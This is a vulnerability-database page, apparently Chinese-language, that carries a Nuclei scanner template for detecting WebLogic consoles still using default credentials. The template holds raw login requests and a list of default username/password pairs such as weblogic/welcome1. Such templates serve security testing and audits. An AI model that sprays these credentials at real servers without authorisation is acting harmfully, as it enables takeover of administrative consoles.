weblogic-weak-login: WebLogic Default Login

日期: 2025-08-01 | 影响软件: weblogic | POC: 已公开

漏洞描述

WebLogic default login credentials were discovered.

PoC代码[已公开]

id: weblogic-weak-login

info:
  name: WebLogic Default Login
  author: pdteam
  severity: high
  description: WebLogic default login credentials were discovered.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password
    - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 16
  tags: default-login,weblogic,vulhub,vuln

http:
  - raw:
      - |
        GET /console/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /console/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8

    attack: pitchfork
    payloads:
      username:
        - weblogic
        - weblogic
        - weblogic
        - weblogic
        - weblogic
        - admin
        - admin
        - system
      password:
        - weblogic
        - weblogic1
        - welcome1
        - Oracle@123
        - weblogic123
        - 12345678
        - security
        - password
    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - "/console/index.jsp"
          - "ADMINCONSOLESESSION"
        condition: and

      - type: status
        status:
          - 302
# digest: 4a0a004730450220266ca92d38b180d9922223fd5a7be963edc6d9d0e969bf31dda08ee66cdd86f5022100882f2d8db0980a82142c770aa34b6fb34e26edf849a4323ac2eb08b341627f14:922c64590222798bb761d5b6d8e72950

相关漏洞推荐